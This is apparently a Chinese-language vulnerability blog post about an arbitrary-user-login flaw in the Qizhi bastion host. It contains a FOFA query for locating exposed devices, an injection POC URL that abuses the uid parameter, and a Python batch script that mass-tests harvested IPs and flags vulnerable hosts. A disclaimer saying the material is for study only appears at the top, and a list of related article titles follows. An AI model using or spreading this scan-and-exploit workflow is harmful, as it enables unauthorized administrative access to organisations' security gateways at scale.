声明:仅供漏洞检测和学习,勿用于非法测试

漏洞信息

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞,访问特定的Url即可获得后台权限。漏洞情报泄露时间:2021-04-10 23:03:05

fofa查询语法

app=“齐治科技-堡垒机”

POC

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

批量检测脚本

可以先用fofa批量获取ip -》批量爬取fofa查询的目标ip地址

from requests.packages import urllib3
urllib3.disable_warnings()
import requests
from colorama import init
init(autoreset=True)
headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',}for url in open("./app=齐治科技-堡垒机.txt",'r'):#读取出来的数据默认加了换行符,这里要去掉url = url.strip("\n")vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"try:re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'})if "您尚未登录或者您的会话已超时,请 重新登录系统" in re.text:print(f"{url}漏洞不存在")elif "错误的id" in re.text:print(f"\033[0;32m{vu_url}漏洞存在\033[0m")except:print(f"{url}无响应")
print('ok')

齐治堡垒机任意用户登录漏洞相关推荐

  1. H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

    H3C SecParh堡垒机任意用户登录与远程执行代码漏洞 1.H3C SecParh堡垒机任意用户登录漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构 ...

  2. 齐治堡垒机配置文件服务器,登录齐治堡垒机简易使用手册V

    应用公布手册配置管理员杭州奇智信息科技 20XX年3月 版本 目录 第1章 用户登录shterm. . . . . . . . . . . . . . . . . . . . . . . . . ...

  3. mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce

    1.绿盟UTS绕过登录 随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录 直接请求接口:/webapi/v1/syst ...

  4. 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析

    一.基本信息 参考:https://www.cnvd.org.cn/flaw/show/1559039 补丁信息:该漏洞的修复补丁已于2019年4月1日发布.如果客户尚未修复该补丁,可联系齐治科技的技 ...

  5. mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明

    尊敬的用户: 齐治科技(下述简称"齐治")注意到近期有消息称"齐治堡垒机存在未修复的前台远程代码执行漏洞".经过确认,消息提及的漏洞是齐治已停售产品Shterm ...

  6. 安恒堡垒机使用手册_齐治堡垒机简易使用手册

    ================ 精选公文范文, 管理类, 工作总结类, 工作计划类文档, 欢迎阅读下载 ============== -------------------- 精选公文范文,管理类, ...

  7. 齐治堡垒机配置文件服务器,齐治堡垒机操作手册-20210703081118.docx-原创力文档

    Copyright ? 2009-2011 Copyright ? 2009-2011 齐治科技Page PAGE # 齐治堡垒机操作手册 中国旅游集团 信息共享中心 2020年2月 版本 TOC \ ...

  8. 浪潮ClusterEngineV4.0 任意用户登录漏洞

    文章目录 漏洞名称 漏洞描述 影响版本 fofa 漏洞复现 第一步 登录页面 第二步 成功登录后台 摘抄 漏洞名称 浪潮ClusterEngineV4.0 存在任意用户登录漏洞, 漏洞描述 浪潮Clu ...

  9. 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)

    因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...

最新文章

  1. 用matlab判断文件是否存在_判断文件夹、文件是否存在、创建文件 c++ matlab
  2. [转]cocos2d游戏开发,常用工具集合
  3. Jquery 关于span标签的取值赋值用法
  4. 《第一行代码》学习笔记11-活动Activity(9)
  5. java json float_java – Json解析问题(值自动更改为float)
  6. 超过父控件的部分不能响应事件怎么办
  7. 【算法与数据结构】——并查集
  8. 20210706_IEEEDataPort免费订阅
  9. HDFS数据加密空间--Encryption zone
  10. 金山和微软word脚注和尾注问题
  11. 从win10回退到win7的苦逼经历
  12. C++第三次实验:税收计算
  13. spring-定时任务
  14. 计算机类学生考试系统,学生在线考试系统.doc
  15. 7723java世界Ol,你不知道的《世界OL》
  16. java去掉date分时秒_java Date获取年月日时分秒的实现方法
  17. 一个简单的小游戏——“数字炸弹”的实现
  18. Mac系统 Terminal终端功能使用方法
  19. Python手写汉字(中文)识别~单字/多字推荐模式
  20. 饿了么开放平台接入(2)——使用Java对接店铺

热门文章

  1. 在计算机网络的工作模式中,在计算机网络的工作模式中,网络中计算机角色既是客户机又是服务器,及提供服务又使用服务,这种模式成为( )...
  2. Sorting Pancakes(dp)
  3. 研究 | 健康大数据平台的“区块链治理”
  4. 数据结构课设+校园导航系统
  5. 在一圆周上任意取三个点构成锐角三角形的概率是多少?
  6. 分布式事务解决方案之RabbitMQ
  7. 2023最新Mac电脑必备推荐下载 缺一不可|新手Mac软件下载
  8. 快速部署Melodic开发环境
  9. C#地理信息编辑器GIS编辑方案, Winform GIS编辑器,C#地理信息编辑器,.NET地理信息编辑器...
  10. H5页面点击调起腾讯/百度/高德地图APP